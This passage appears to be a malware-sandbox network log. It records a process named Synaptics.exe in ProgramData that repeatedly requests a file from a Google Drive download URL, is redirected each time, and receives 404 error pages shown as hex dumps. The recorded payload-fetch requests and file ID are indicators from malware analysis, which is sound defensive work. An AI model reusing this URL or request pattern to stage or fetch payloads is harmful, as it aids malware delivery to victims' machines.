                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:16 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:16 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-GKOrkWo0ZBSg1gOg9EhJzw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            24192.168.2.849763142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:16 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:16 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:16 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-i0FwZ7aiQyqQ8iHDFlV7uA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            25192.168.2.849764142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:16 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:17 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC6Tx6tBfmQh65dyzHPF0TNM06jtUDHQON5uBt6FA90nx3HeEgLYrm076K4Dt66uazWy
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:16 GMT
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-plfEgZaNX81gChnJ6Lr7-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:17 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                            2024-12-30 10:49:17 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 56 44 47 46 75 76 64 44 4d 76 36 31 52 7a 71 50 32 6e 57 72 52 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                            Data Ascii: t Found)!!1</title><style nonce="VDGFuvdDMv61RzqP2nWrRg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                            2024-12-30 10:49:17 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            26192.168.2.849765142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:17 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:17 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:17 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-kZHkkSX_aFqu-Aa8taPKoQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            27192.168.2.849766142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:17 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:17 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC5S2IJ7GxATRRBPJL5WO93IJQulfmVN9N-PBfbHSBb4VIp0s41lyDZh_zNSbtdMmFJB
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:17 GMT
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-pqzDrSWGpnO8A8-9GLRIZg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:17 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                            2024-12-30 10:49:17 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6d 77 51 42 30 6c 43 6e 74 4e 6d 45 74 64 73 39 49 43 57 68 5a 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                            Data Ascii: t Found)!!1</title><style nonce="mwQB0lCntNmEtds9ICWhZA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                            2024-12-30 10:49:17 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            28192.168.2.849767142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:17 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:17 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:17 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-JJmWztadOuGcH_nCQXXH6g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            29192.168.2.849768142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:17 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:18 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC6Cy3AGllTAKo31nhVbw7zqsunY3CNSXYX97cBzLD76JYmjgc70HlC3G6gbHzcE5zuikGGz16I
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:17 GMT
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-UzVx6tpCgm61b0isduHATQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:18 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                            2024-12-30 10:49:18 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 39 72 4f 50 77 39 71 59 31 31 56 47 4e 36 57 31 45 74 53 70 31 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="9rOPw9qY11VGN6W1EtSp1Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                            2024-12-30 10:49:18 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            30192.168.2.849775142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:19 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
